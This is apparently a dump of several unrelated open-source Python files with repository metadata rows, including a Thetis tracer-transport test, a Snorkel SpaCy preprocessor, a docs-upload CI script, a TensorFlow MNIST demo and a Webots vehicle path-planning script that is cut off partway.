Solve the `Point Discharge with Diffusion' steady-state tracer transport
test case from [1]. This problem has a source term, which involves a
Dirac delta function. It also has an analytical solution, which may be
expressed in terms of modified Bessel functions.
As in [2], convergence of two diagnostic quantities of interest is
assessed. These are simple integrals of the tracer concentration over
circular 'receiver' regions. The 'aligned' receiver is directly downstream
in the flow and the 'offset' receiver is shifted in the positive y-direction.
:arg mesh2d: mesh upon which to solve the tracer transport problem.
:arg offset: toggle between aligned and offset source/receiver.
:kwarg hydrodynamics: solve shallow water equations?
:kwarg solve_adjoint: solve the adjoint problem as well as the forward one?
"""
P1_2d = FunctionSpace(mesh2d, "CG", 1)
# Set up parameter class
tracer_element_family = model_options.get("tracer_element_family", "cg")
params = PointDischargeParameters(offset, tracer_element_family)
source = params.source(P1_2d)
# Solve tracer transport problem
solver_obj = solver2d.FlowSolver2d(mesh2d, params.bathymetry(P1_2d))
options = solver_obj.options
options.swe_timestepper_type = 'SteadyState'
options.tracer_timestepper_type = 'SteadyState'
options.tracer_element_family = tracer_element_family
options.timestep = 20.0
options.simulation_end_time = 18.0
options.simulation_export_time = 18.0
options.swe_timestepper_options.solver_parameters['pc_factor_mat_solver_type'] = 'mumps'
options.swe_timestepper_options.solver_parameters['snes_monitor'] = None
options.tracer_timestepper_options.solver_parameters['pc_factor_mat_solver_type'] = 'mumps'
options.tracer_timestepper_options.solver_parameters['snes_monitor'] = None
options.fields_to_export = ['tracer_2d', 'uv_2d', 'elev_2d']
# Hydrodynamics
options.element_family = 'dg-dg'
options.horizontal_viscosity = params.viscosity
options.quadratic_drag_coefficient = params.drag
options.use_lax_friedrichs_velocity = True
options.lax_friedrichs_velocity_scaling_factor = Constant(1.0)
# Passive tracer
options.add_tracer_2d('tracer_2d', 'Depth averaged tracer', 'Tracer2d',
diffusivity=params.diffusivity, source=source)
options.horizontal_velocity_scale = Constant(1.0)
options.horizontal_diffusivity_scale = Constant(0.0)
options.tracer_only = not hydrodynamics
options.use_supg_tracer = tracer_element_family == 'cg'
options.use_lax_friedrichs_tracer = tracer_element_family == 'dg'
options.lax_friedrichs_tracer_scaling_factor = Constant(1.0)
options.use_limiter_for_tracers = tracer_element_family == 'dg'
options.update(model_options)
# Initial and boundary conditions
solver_obj.bnd_functions = params.boundary_conditions
uv_init = Constant(as_vector([1.0e-08, 0.0])) if hydrodynamics else params.uv
solver_obj.assign_initial_conditions(tracer=source, uv=uv_init, elev=params.elev)
# Solve
solver_obj.iterate()
c_2d = solver_obj.fields.tracer_2d
if not solve_adjoint:
return c_2d
# Solve adjoint problem
J = params.quantity_of_interest_form(c_2d)
F = solver_obj.timestepper.timesteppers["tracer_2d"].F
Q_2d = solver_obj.function_spaces.Q_2d
adj_sol = Function(Q_2d)
dFdc = derivative(F, c_2d, TrialFunction(Q_2d))
dFdc_transpose = adjoint(dFdc)
dJdc = derivative(J, c_2d, TestFunction(Q_2d))
solve(dFdc_transpose == dJdc, adj_sol)
return solver_obj, adj_sol
def run_convergence(offset, num_levels=3, plot=False, **kwargs):
"""
Assess convergence of the quantity of interest with increasing DoF count.
:arg offset: toggle between aligned and offset source/receiver.
:kwarg num_levels: number of uniform refinements to consider.
:kwarg plot: toggle plotting of convergence curves.
:kwargs: other kwargs are passed to `solve_tracer`.
"""
J = []
dof_count = []
tracer_element_family = kwargs.get('tracer_element_family')
params = PointDischargeParameters(offset, tracer_element_family)
# Run model on a sequence of uniform meshes and compute QoI error
for n in range(num_levels):
mesh2d = RectangleMesh(100*2**n, 20*2**n, 50, 10)
sol = solve_tracer(mesh2d, offset, **kwargs)
J.append(params.quantity_of_interest(sol))
dof_count.append(sol.function_space().dof_count)
J_analytical = params.analytical_quantity_of_interest(sol.function_space().mesh())
relative_error = numpy.abs((numpy.array(J) - J_analytical)/J_analytical)
# Plot convergence curves
if plot:
import matplotlib.pyplot as plt
fig, axes = plt.subplots()
axes.loglog(dof_count, relative_error, '--x')
axes.set_xlabel("DoF count")
axes.set_ylabel("QoI error")
axes.grid(True)
alignment = 'offset' if offset else 'aligned'
fname = f"steady_state_convergence_{alignment}_{tracer_element_family}.png"
plot_dir = create_directory(os.path.join(os.path.dirname(__file__), 'outputs'))
plt.savefig(os.path.join(plot_dir, fname))
# Check for linear convergence
delta_y = numpy.log10(relative_error[-1]) - numpy.log10(relative_error[0])
delta_x = numpy.log10(dof_count[-1]) - numpy.log10(dof_count[0])
rate = abs(delta_y/delta_x)
assert rate > 0.9, f"Sublinear convergence rate {rate:.4f}"
def estimate_error(mesh, offset, **model_options):
model_options["solve_adjoint"] = True
# Create a two level mesh hierarchy
mesh0, mesh1 = MeshHierarchy(mesh, 1)
tm = TransferManager()
# Solve both forward and adjoint on both meshes
solver_obj, a0 = solve_tracer(mesh0, offset, **model_options)
f0 = solver_obj.fields.tracer_2d
P0 = solver_obj.function_spaces.P0_2d
solver_obj, a1 = solve_tracer(mesh1, offset, **model_options)
# Approximate adjoint error
Q1 = solver_obj.function_spaces.Q_2d
a0plg = Function(Q1)
tm.prolong(a0, a0plg)
a1err = Function(Q1).assign(a1 - a0plg)
# Compute dual weighted residual
ei = diagnostics.TracerDualWeightedResidual2D(solver_obj, a1err)
ei.solve()
# Project down to base space
error = Function(P0, name="Error indicator")
error.project(ei.error)
error.interpolate(abs(error))
# Plot
if not model_options.get("no_exports", False):
File("outputs/forward.pvd").write(f0)
a0.rename("Adjoint solution")
File("outputs/adjoint.pvd").write(a0)
File("outputs/error.pvd").write(error)
return f0, a0, error
# ---------------------------
# standard tests for pytest
# ---------------------------
@pytest.fixture(params=['dg', 'cg'])
def family(request):
return request.param
@pytest.fixture(params=[False, True], ids=["aligned", "offset"])
def offset(request):
return request.param
def test_hydrodynamics(offset, family):
"""
Test that we can solve the coupled system
on a coarse mesh.
"""
mesh2d = RectangleMesh(100, 20, 50, 10)
solve_tracer(mesh2d, offset, tracer_element_family=family,
no_exports=True)
def test_convergence(offset, family):
"""
Test that the quantity of interest converges
linearly with uniform mesh refinement.
"""
run_convergence(offset, tracer_element_family=family,
no_exports=True)
def test_dwr(offset, family):
"""
Test that we can successfully compute dual
weighted residual contributions.
"""
mesh2d = RectangleMesh(100, 20, 50, 10)
estimate_error(mesh2d, offset, tracer_element_family=family,
no_exports=True)
# ---------------------------
# run individual setup for debugging
# ---------------------------
if __name__ == "__main__":
n = 0
mesh2d = RectangleMesh(100*2**n, 20*2**n, 50, 10)
estimate_error(mesh2d, True, tracer_element_family="cg", no_exports=False)
| 37.90107
| 95
| 0.66455
|
acff742776cadacab0bef2970536c500fe687204
| 2,706
|
py
|
Python
|
snorkel/preprocess/nlp.py
|
ptrcklv/snorkel
|
03e4b756cd72433055bcd14e0ceb151a7fa6f393
|
[
"Apache-2.0"
] | 1
|
2020-06-06T05:04:12.000Z
|
2020-06-06T05:04:12.000Z
|
snorkel/preprocess/nlp.py
|
ptrcklv/snorkel
|
03e4b756cd72433055bcd14e0ceb151a7fa6f393
|
[
"Apache-2.0"
] | null | null | null |
snorkel/preprocess/nlp.py
|
ptrcklv/snorkel
|
03e4b756cd72433055bcd14e0ceb151a7fa6f393
|
[
"Apache-2.0"
] | 1
|
2021-04-25T21:19:21.000Z
|
2021-04-25T21:19:21.000Z
|
from typing import List, Optional
import spacy
from snorkel.types import FieldMap
from .core import BasePreprocessor, Preprocessor
EN_CORE_WEB_SM = "en_core_web_sm"
class SpacyPreprocessor(Preprocessor):
"""Preprocessor that parses input text via a SpaCy model.
A common approach to writing LFs over text is to first use
a natural language parser to decompose the text into tokens,
part-of-speech tags, etc. SpaCy (https://spacy.io/) is a
popular tool for doing this. This preprocessor adds a
SpaCy ``Doc`` object to the data point. A ``Doc`` object is
a sequence of ``Token`` objects, which contain information
on lemmatization, parts-of-speech, etc. ``Doc`` objects also
contain fields like ``Doc.ents``, a list of named entities,
and ``Doc.noun_chunks``, a list of noun phrases. For details
of SpaCy ``Doc`` objects and a full attribute listing,
see https://spacy.io/api/doc.
Parameters
----------
text_field
Name of data point text field to input
doc_field
Name of data point field to output parsed document to
language
SpaCy model to load
See https://spacy.io/usage/models#usage
disable
List of pipeline components to disable
See https://spacy.io/usage/processing-pipelines#disabling
pre
Preprocessors to run before this preprocessor is executed
memoize
Memoize preprocessor outputs?
gpu
Prefer Spacy GPU processing?
"""
def __init__(
self,
text_field: str,
doc_field: str,
language: str = EN_CORE_WEB_SM,
disable: Optional[List[str]] = None,
pre: Optional[List[BasePreprocessor]] = None,
memoize: bool = False,
gpu: bool = False,
) -> None:
name = type(self).__name__
super().__init__(
name,
field_names=dict(text=text_field),
mapped_field_names=dict(doc=doc_field),
pre=pre,
memoize=memoize,
)
self.gpu = gpu
if self.gpu:
spacy.prefer_gpu()
self._nlp = spacy.load(language, disable=disable or [])
def run(self, text: str) -> FieldMap: # type: ignore
"""Run the SpaCy model on input text.
Parameters
----------
text
Text of document to parse
Returns
-------
FieldMap
Dictionary with a single key (``"doc"``), mapping to the
parsed SpaCy ``Doc`` object
"""
# Note: not trying to add the fields of `Doc` to top-level
# as most are Cython property methods computed on the fly.
return dict(doc=self._nlp(text))
| 31.103448
| 68
| 0.619734
|
acff746704263048475ba36e84be02f7ee47bd0c
| 580
|
py
|
Python
|
7kyu/fibonacci-fizzbuzz/fibonacci_fizzbuzz.py
|
seattlechem/codewars
|
885293e7ad5fb427c07792ed85d74881a5ebad29
|
[
"MIT"
] | null | null | null |
7kyu/fibonacci-fizzbuzz/fibonacci_fizzbuzz.py
|
seattlechem/codewars
|
885293e7ad5fb427c07792ed85d74881a5ebad29
|
[
"MIT"
] | null | null | null |
7kyu/fibonacci-fizzbuzz/fibonacci_fizzbuzz.py
|
seattlechem/codewars
|
885293e7ad5fb427c07792ed85d74881a5ebad29
|
[
"MIT"
] | null | null | null |
"""Fibonacci fizz buzz."""
def fibs_fizz_buzz(k):
"""My fibonacci fizz buzz solution."""
res = [1, 1]
# n has to be greater than 2
if k <= 2:
return res[:k]
else:
for i in range(k - 2):
res.append(res[i] + res[i + 1])
for i in range(len(res)):
# always and condition must be checked first
if res[i] % 15 == 0:
res[i] = 'FizzBuzz'
elif res[i] % 5 == 0:
res[i] = 'Buzz'
elif res[i] % 3 == 0:
res[i] = 'Fizz'
return res
| 25.217391
| 56
| 0.439655
|
acff748a7488717dc07c5411d1e150adca94721e
| 2,920
|
py
|
Python
|
tools/ci/upload-gh-pages.py
|
mge-engine/mge
|
e7a6253f99dd640a655d9a80b94118d35c7d8139
|
[
"MIT"
] | null | null | null |
tools/ci/upload-gh-pages.py
|
mge-engine/mge
|
e7a6253f99dd640a655d9a80b94118d35c7d8139
|
[
"MIT"
] | 91
|
2019-03-09T11:31:29.000Z
|
2022-02-27T13:06:06.000Z
|
tools/ci/upload-gh-pages.py
|
mge-engine/mge
|
e7a6253f99dd640a655d9a80b94118d35c7d8139
|
[
"MIT"
] | null | null | null |
# mge - Modern Game Engine
# Copyright (c) 2021 by Alexander Schroeder
# All rights reserved.
import sys
import os
import subprocess
import shutil
upload_branches = ["main"]
branch = ""
pull_request_number = ""
try:
branch = os.environ["APPVEYOR_REPO_BRANCH"]
except:
pass
try:
pull_request_number = os.environ["APPVEYOR_PULL_REQUEST_NUMBER"]
except:
pass
message = "Update gh-pages from generated documentation"
def upload_enabled():
try:
env = os.environ.copy()
if pull_request_number != "":
print("Commit is a pull request, not uploading", flush=True)
return False
if branch in upload_branches:
print("Branch is %s, upload enabled" %
(env["APPVEYOR_REPO_BRANCH"]), flush=True)
return True
except:
pass
return False
def upload_enabled_special_commit():
try:
env = os.environ.copy()
if "update gh-pages" in env["APPVEYOR_REPO_COMMIT_MESSAGE"]:
branch = "main" # treat this as dev version
print("Updating gh-pages due to special commit message", flush=True)
return True
except:
pass
return False
def upload_enabled_sys_argv():
try:
if sys.argv[1] == '-f':
branch = "main"
print("Updating gh-pages due to force flag", flush=True)
return True
except:
pass
return False
def copy2_verbose(src, dst):
print('Copying {0}'.format(src), flush=True)
shutil.copy2(src, dst)
def upload(branch):
if os.path.exists("gh-pages"):
print("Remove old gh-pages directory", flush=True)
subprocess.run(["rd", "/s", "/q", "gh-pages"], shell=True)
print("Cloning gh-pages branch", flush=True)
subprocess.run(["git", "clone", "-q", "--branch=gh-pages",
"https://github.com/mge-engine/mge.git", "gh-pages"], shell=True)
print("Remove old files", flush=True)
subprocess.run(["git", "rm", "-rf", branch +
"/manual-html"], cwd="gh-pages")
subprocess.run(["dir", "..\\docsrc\\manual\\manual-html"],
shell=True, cwd="gh-pages")
shutil.copytree("docsrc/manual/manual-html",
"gh-pages/" + branch + "/manual-html", copy_function=copy2_verbose)
print("Adding files to git", flush=True)
subprocess.run(
["git", "add", branch + "/manual-html"], cwd="gh-pages")
print("Commit git changes", flush=True)
subprocess.run(["git", "commit", "-m", message], cwd="gh-pages")
subprocess.run(["git", "push", "origin"], cwd="gh-pages")
try:
if upload_enabled():
upload(branch)
elif upload_enabled_special_commit() or upload_enabled_sys_argv():
upload("main")
else:
print("No upload to gh-pages from this build")
except:
print("Exception %s" % str(sys.exc_info()))
sys.exit(1)
sys.exit(0)
| 29.2
| 87
| 0.605479
|
acff75c66dc0291ebb77a69f553401a961a93d46
| 1,284
|
py
|
Python
|
careplus/feeds/migrations/0001_initial.py
|
stemado/satb
|
7ef5698db8125072e3609da3766d3e80feff6e40
|
[
"MIT"
] | null | null | null |
careplus/feeds/migrations/0001_initial.py
|
stemado/satb
|
7ef5698db8125072e3609da3766d3e80feff6e40
|
[
"MIT"
] | 8
|
2020-03-24T15:42:15.000Z
|
2022-01-13T00:44:54.000Z
|
careplus/feeds/migrations/0001_initial.py
|
stemado/satb
|
7ef5698db8125072e3609da3766d3e80feff6e40
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-07-27 13:23
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Feed',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateTimeField(auto_now_add=True)),
('post', models.TextField(max_length=255)),
('likes', models.IntegerField(default=0)),
('comments', models.IntegerField(default=0)),
('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='feeds.Feed')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Feeds',
'verbose_name': 'Feed',
'ordering': ('-date',),
},
),
]
| 34.702703
| 131
| 0.596573
|
acff768325f8693fef608a5c9c7df6b23d2eb479
| 3,144
|
py
|
Python
|
MNIST_tf_demo.py
|
RodericDay/fix-the-sky
|
907059d230bb9d7d96eee725aa0a6d73d5fafc89
|
[
"MIT"
] | null | null | null |
MNIST_tf_demo.py
|
RodericDay/fix-the-sky
|
907059d230bb9d7d96eee725aa0a6d73d5fafc89
|
[
"MIT"
] | 1
|
2017-08-26T18:30:04.000Z
|
2017-08-26T18:30:04.000Z
|
MNIST_tf_demo.py
|
RodericDay/fix-the-sky
|
907059d230bb9d7d96eee725aa0a6d73d5fafc89
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('MNIST_data', one_hot = True)
def main():
print('MNIST')
sess = tf.InteractiveSession()
#placeholders
x = tf.placeholder(tf.float32, shape=[None,784])
y_ = tf.placeholder(tf.float32, shape=[None,10])
#variables
W=tf.Variable(tf.zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
sess.run(tf.global_variables_initializer())
y = tf.matmul(x,W) + b
#loss fnc
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits = y))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
for _ in range(1000):
batch = mnist.train.next_batch(100)
train_step.run(feed_dict={x: batch[0], y_: batch[1]})
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))
print(accuracy.eval(feed_dict={x:mnist.test.images, y_: mnist.test.labels}))
#convNN
W_conv1 = weight_variable([5,5,1,32])
b_conv1 = bias_variable([32])
x_image = tf.reshape(x,[-1,28,28,1])
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
W_conv2 = weight_variable([5, 5, 32, 64])
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
W_fc1 = weight_variable([7 * 7 * 64, 1024])
b_fc1 = bias_variable([1024])
h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
W_fc2 = weight_variable([1024,10])
b_fc2 = bias_variable([10])
y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for i in range(20000):
batch = mnist.train.next_batch(50)
if i % 100 == 0:
train_accuracy = accuracy.eval(feed_dict={
x: batch[0], y_: batch[1], keep_prob: 1.0})
print('step %d, training accuracy %g' % (i, train_accuracy))
train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
print('test accuracy %g' % accuracy.eval(feed_dict={
x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev = 0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def conv2d(x,W):
return tf.nn.conv2d(x,W,strides=[1,1,1,1], padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')
if __name__ == "__main__":
print('heerrrooo')
main()
| 28.581818
| 96
| 0.69243
|
acff76f390954526a90aac1aec63ef3fb162fdac
| 2,652
|
py
|
Python
|
copasi/bindings/python/unittests/Test_CReport.py
|
bmoreau/COPASI
|
d0bbec8947b1266ffd2b0ecf2566da7cf2c3e5ba
|
[
"Artistic-2.0"
] | null | null | null |
copasi/bindings/python/unittests/Test_CReport.py
|
bmoreau/COPASI
|
d0bbec8947b1266ffd2b0ecf2566da7cf2c3e5ba
|
[
"Artistic-2.0"
] | null | null | null |
copasi/bindings/python/unittests/Test_CReport.py
|
bmoreau/COPASI
|
d0bbec8947b1266ffd2b0ecf2566da7cf2c3e5ba
|
[
"Artistic-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Begin CVS Header
# $Source: /Volumes/Home/Users/shoops/cvs/copasi_dev/copasi/bindings/python/unittests/Test_CReport.py,v $
# $Revision: 1.4 $
# $Name: $
# $Author: shoops $
# $Date: 2010/07/16 18:55:59 $
# End CVS Header
# Copyright (C) 2010 by Pedro Mendes, Virginia Tech Intellectual
# Properties, Inc., University of Heidelberg, and The University
# of Manchester.
# All rights reserved.
# Copyright (C) 2008 by Pedro Mendes, Virginia Tech Intellectual
# Properties, Inc., EML Research, gGmbH, University of Heidelberg,
# and The University of Manchester.
# All rights reserved.
import COPASI
import unittest
from types import *
class Test_CReport(unittest.TestCase):
def setUp(self):
self.datamodel=COPASI.CCopasiRootContainer.addDatamodel()
self.task=self.datamodel.getTask(0)
self.report=self.task.getReport()
def test_getReportDefinition(self):
reportDefinition=self.report.getReportDefinition()
self.assert_(reportDefinition!=None)
self.assert_(reportDefinition.__class__==COPASI.CReportDefinition)
def test_setReportDefinition(self):
listOfReportDefinitions=self.datamodel.getReportDefinitionList()
reportDefinition=listOfReportDefinitions.createReportDefinition("MyReportDefinition","No Comment")
self.assert_(reportDefinition!=None)
self.report.setReportDefinition(reportDefinition)
self.assert_(self.report.getReportDefinition().getKey()==reportDefinition.getKey())
def test_getTarget(self):
target=self.report.getTarget()
self.assert_(target!=None)
self.assert_(type(target)==StringType)
def test_setTarget(self):
target="MyTaget.txt"
self.report.setTarget(target)
t=self.report.getTarget()
self.assert_(t!=None)
self.assert_(t==target)
def test_append(self):
append=self.report.append()
self.assert_(type(append)==BooleanType)
def test_setAppend(self):
self.report.setAppend(True)
append=self.report.append()
self.assert_(append==True)
self.report.setAppend(False)
append=self.report.append()
self.assert_(append==False)
def suite():
tests=[
'test_getReportDefinition'
,'test_setReportDefinition'
,'test_getTarget'
,'test_setTarget'
,'test_append'
,'test_setAppend'
]
return unittest.TestSuite(map(Test_CReport,tests))
if(__name__ == '__main__'):
unittest.TextTestRunner(verbosity=2).run(suite())
| 30.482759
| 108
| 0.671192
|
acff7760ff28e7b3bb473de79b02838d74d337b8
| 219
|
py
|
Python
|
parse_log.py
|
rynecarbone/Pokerly
|
e1368eecab129ab0d94c3d043071c686111723a2
|
[
"MIT"
] | null | null | null |
parse_log.py
|
rynecarbone/Pokerly
|
e1368eecab129ab0d94c3d043071c686111723a2
|
[
"MIT"
] | null | null | null |
parse_log.py
|
rynecarbone/Pokerly
|
e1368eecab129ab0d94c3d043071c686111723a2
|
[
"MIT"
] | null | null | null |
import pstats
import sys
#o_file= sys.argv[1] if len(sys.argv)>1 else out.
#print(n_lines)
p = pstats.Stats('log_profile.txt')
#p.sort_stats('cumulative').print_stats(n_lines)
p.sort_stats('cumulative').print_stats()
| 21.9
| 49
| 0.748858
|
acff7781b62732c9342e5a905df44809cd514c07
| 770
|
py
|
Python
|
corehq/apps/notifications/migrations/0003_lastseennotification.py
|
dimagilg/commcare-hq
|
ea1786238eae556bb7f1cbd8d2460171af1b619c
|
[
"BSD-3-Clause"
] | 471
|
2015-01-10T02:55:01.000Z
|
2022-03-29T18:07:18.000Z
|
corehq/apps/notifications/migrations/0003_lastseennotification.py
|
dimagilg/commcare-hq
|
ea1786238eae556bb7f1cbd8d2460171af1b619c
|
[
"BSD-3-Clause"
] | 14,354
|
2015-01-01T07:38:23.000Z
|
2022-03-31T20:55:14.000Z
|
corehq/apps/notifications/migrations/0003_lastseennotification.py
|
dimagilg/commcare-hq
|
ea1786238eae556bb7f1cbd8d2460171af1b619c
|
[
"BSD-3-Clause"
] | 175
|
2015-01-06T07:16:47.000Z
|
2022-03-29T13:27:01.000Z
|
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('notifications', '0002_auto_20160505_2058'),
]
operations = [
migrations.CreateModel(
name='LastSeenNotification',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('last_seen_date', models.DateTimeField()),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, unique=True, on_delete=models.CASCADE)),
],
options={
},
bases=(models.Model,),
),
]
| 30.8
| 114
| 0.605195
|
acff7921ca77e56fd2039e7bd515b3170d0243fe
| 474
|
py
|
Python
|
temboo/core/Library/Amazon/Marketplace/Inventory/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Amazon/Marketplace/Inventory/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Amazon/Marketplace/Inventory/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Amazon.Marketplace.Inventory.ListInventorySupplyByDateRange import ListInventorySupplyByDateRange, ListInventorySupplyByDateRangeInputSet, ListInventorySupplyByDateRangeResultSet, ListInventorySupplyByDateRangeChoreographyExecution
from temboo.Library.Amazon.Marketplace.Inventory.ListInventorySupplyBySKU import ListInventorySupplyBySKU, ListInventorySupplyBySKUInputSet, ListInventorySupplyBySKUResultSet, ListInventorySupplyBySKUChoreographyExecution
| 158
| 251
| 0.936709
|
acff79385c85001e6e20f515caa2c531e36de760
| 158
|
py
|
Python
|
data_log_sheet/apps.py
|
antonnifo/DIT
|
7c496f37bab70229cd84c4b33332708ea8cf278b
|
[
"MIT"
] | null | null | null |
data_log_sheet/apps.py
|
antonnifo/DIT
|
7c496f37bab70229cd84c4b33332708ea8cf278b
|
[
"MIT"
] | null | null | null |
data_log_sheet/apps.py
|
antonnifo/DIT
|
7c496f37bab70229cd84c4b33332708ea8cf278b
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class DataLogSheetConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'data_log_sheet'
| 22.571429
| 56
| 0.778481
|
acff7995e100589dcf57ccfe139afe9f28637f59
| 558
|
py
|
Python
|
Ejercicios/Diccionario/Ejercicio2 Diccionario.py
|
Dharian/pythonProject
|
262d2b58d99befe668d29198bb28c98b75597a34
|
[
"MIT"
] | null | null | null |
Ejercicios/Diccionario/Ejercicio2 Diccionario.py
|
Dharian/pythonProject
|
262d2b58d99befe668d29198bb28c98b75597a34
|
[
"MIT"
] | null | null | null |
Ejercicios/Diccionario/Ejercicio2 Diccionario.py
|
Dharian/pythonProject
|
262d2b58d99befe668d29198bb28c98b75597a34
|
[
"MIT"
] | null | null | null |
def cargar_diccionario():
diccionario={}
for x in range(5):
nombre=str(input("Cual es el nombre del producto? "))
valor=int(input("Cual es el valor del producto? "))
diccionario[nombre]= valor
imprimir(diccionario)
imprimir_mayor100(diccionario)
def imprimir(diccionario):
print(diccionario)
print("diccionario completo impreso")
def imprimir_mayor100(diccionario):
for x in diccionario:
if diccionario[x] >= 100:
print(x,diccionario[x])
cargar_diccionario()
| 27.9
| 61
| 0.643369
|
acff79a23322dd48411f8682d31d40447da4575d
| 25,078
|
py
|
Python
|
src/scenarios/Overtaking/camera_agent_3.py
|
SahilDhull/autonomous
|
378fc7d6c5a9c34c4e915f080fb78ed5c11195d6
|
[
"MIT"
] | 3
|
2020-02-28T12:04:26.000Z
|
2022-02-27T00:42:56.000Z
|
src/scenarios/Overtaking/camera_agent_3.py
|
SahilDhull/autonomous
|
378fc7d6c5a9c34c4e915f080fb78ed5c11195d6
|
[
"MIT"
] | null | null | null |
src/scenarios/Overtaking/camera_agent_3.py
|
SahilDhull/autonomous
|
378fc7d6c5a9c34c4e915f080fb78ed5c11195d6
|
[
"MIT"
] | null | null | null |
import os
import sys
import math
import time
import csv
sys.path.append(os.path.dirname(os.path.realpath(__file__)) + '/../../') # This is needed for the calls from Matlab
from Sim_ATAV.simulation_control.sim_data import SimData
from Sim_ATAV.simulation_control.webots_sensor import WebotsSensor
from Sim_ATAV.simulation_control.webots_fog import WebotsFog
from Sim_ATAV.simulation_control.webots_pedestrian import WebotsPedestrian
from Sim_ATAV.simulation_control.webots_vehicle import WebotsVehicle
from Sim_ATAV.simulation_control.webots_road import WebotsRoad
from Sim_ATAV.simulation_control.webots_road_disturbance import WebotsRoadDisturbance
from Sim_ATAV.simulation_control.heart_beat import HeartBeatConfig
from Sim_ATAV.simulation_control.item_description import ItemDescription
from Sim_ATAV.simulation_control.webots_controller_parameter import WebotsControllerParameter
from Sim_ATAV.simulation_control.webots_sim_object import WebotsSimObject
from Sim_ATAV.simulation_configurator import sim_config_tools
from Sim_ATAV.simulation_configurator.sim_environment import SimEnvironment
from Sim_ATAV.simulation_control.initial_state_config import InitialStateConfig
from Sim_ATAV.simulation_configurator.view_follow_config import ViewFollowConfig
from Sim_ATAV.simulation_configurator.sim_environment_configurator import SimEnvironmentConfigurator
from Sim_ATAV.simulation_configurator import covering_array_utilities
from Sim_ATAV.simulation_configurator import experiment_tools
# from path import *
# from grid import *
import numpy as np
import copy
import dubins
import shapely.geometry as geom
inf = 1e9
def RadiusofCurvature(start_pt, end_pt, turn_radius=20.0, step_size=1.0):
"""Generate points along a Dubins path connecting start point to end point.
Format for input / output points: (x, y, angle)"""
min_turn_radius = min(0.1, turn_radius)
satisfied = False
configurations = [start_pt, end_pt]
while not satisfied:
dubins_path = dubins.shortest_path(start_pt, end_pt, turn_radius)
configurations, _ = dubins_path.sample_many(step_size)
cex_found = False
for configuration in configurations:
if not (min(start_pt[0], end_pt[0]) - 0.1 <= configuration[0] <= max(start_pt[0], end_pt[0]) + 0.1 and
min(start_pt[1], end_pt[1]) - 0.1 <= configuration[1] <= max(start_pt[1], end_pt[1]) + 0.1):
cex_found = True
break
satisfied = not cex_found
if cex_found:
# Decrease radius until finding a satisfying result.
# We could do a binary search but that requires a termination condition.
turn_radius = turn_radius*0.9
if turn_radius < min_turn_radius:
break
if not satisfied:
return 0.1
return turn_radius
def cost(c1, pt1,pt2, off=0.0):
r = RadiusofCurvature(pt1,pt2)
return c1 + math.sqrt((pt2[0]-pt1[0])**2 + (pt2[1]-pt1[1])**2) + 10.0/r + 10.0*abs(off)
def computeTargetPath():
grid_points = []
x1 = 500.0
x2 = 0
y1 = 0.0
y2 = -40.0
w = 3.6
x_step = 5.0
y_step = 0.4
r_curv = 20.0
x_ctr1 = 0.0
y_ctr1 = -20.0
x_ctr2 = 500.0
